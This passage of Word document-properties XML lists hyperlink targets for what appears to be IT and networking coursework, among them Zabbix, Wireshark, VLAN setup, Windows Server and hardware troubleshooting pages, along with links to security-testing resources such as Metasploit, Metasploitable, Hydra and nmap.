      <vt:variant>
        <vt:i4>960</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949172</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>957</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.wireshark.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7864366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>954</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177432</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>951</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ekahau.com/solutions/wi-fi-heatmaps/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094887</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>948</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6160469</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>945</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1572930</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>942</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3080233</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>939</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063328</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>936</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8192102</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>933</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.transcend-info.com/Support/FAQ-296</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114193</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>930</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dnsstuff.com/what-is-network-topology</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983041</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>927</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274593</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>924</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376269</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>921</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456531</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>918</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6881331</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>915</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.offensive-security.com/metasploit-unleashed/Msfconsole/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2097199</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>912</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/runbooks?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>runbooks-in-service-manager</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194407</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>909</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733281</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>906</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://twitter.com/tos</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6291582</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>903</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/troubleshoot-with-tasks?view=sc-sm-2019%23run-a-task-from-an-incident-view</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>917579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>900</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832716</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>897</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-b3b3ef5b-5953-fb6a-2528-4bbed82fba96</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684726</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>894</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://owasp.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7602283</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>891</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.exploit-db.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2687010</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>888</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>885</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177349</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>882</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7602295</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>879</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.solidworks.com/support/system-requirements</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589907</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>876</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.slavasoft.com/download.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3538980</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>873</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>870</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983117</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>867</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/dcm-incidents?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439502</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>864</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.searchenginewatch.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422574</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>861</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570643</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>858</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621553</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>855</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046318</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>852</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>Step_1_Login_as_Local_Admin</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>849</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179725</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>846</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.qualcomm.com/products/processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>93</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>843</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.nksc.lt/pranesti.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177369</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>840</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.faqs.org/rfcs/rfc826.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4980801</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>837</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://about.pinterest.com/en/terms-service</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915291</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>834</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128823</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>831</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.lifewire.com/wireshark-tutorial-4143298</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128879</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>828</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://windows.microsoft.com/en-us/windows/microsoft-services-agreement</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>825</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://nmap.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>822</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://tools.kali.org/password-attacks/hydra</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>852051</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>819</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://upcloud.com/community/tutorials/install-nextcloud-centos/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046273</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>816</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684706</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>813</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060975</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>810</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cpu-world.com/CPUs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5242963</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>807</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computerhope.com/issues/ch000179.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194311</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>804</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://sourceforge.net/projects/metasploitable/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655426</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>801</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.rapid7.com/metasploit/metasploitable-2/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735679</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>798</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://information.rapid7.com/metasploitable-download.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701724</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>795</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.rapid7.com/metasploit/msf-overview/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966173</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>792</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094892</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>789</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=lqjrF7f_eI4</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145778</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>786</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/user-roles?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359400</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>783</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815757</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>780</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
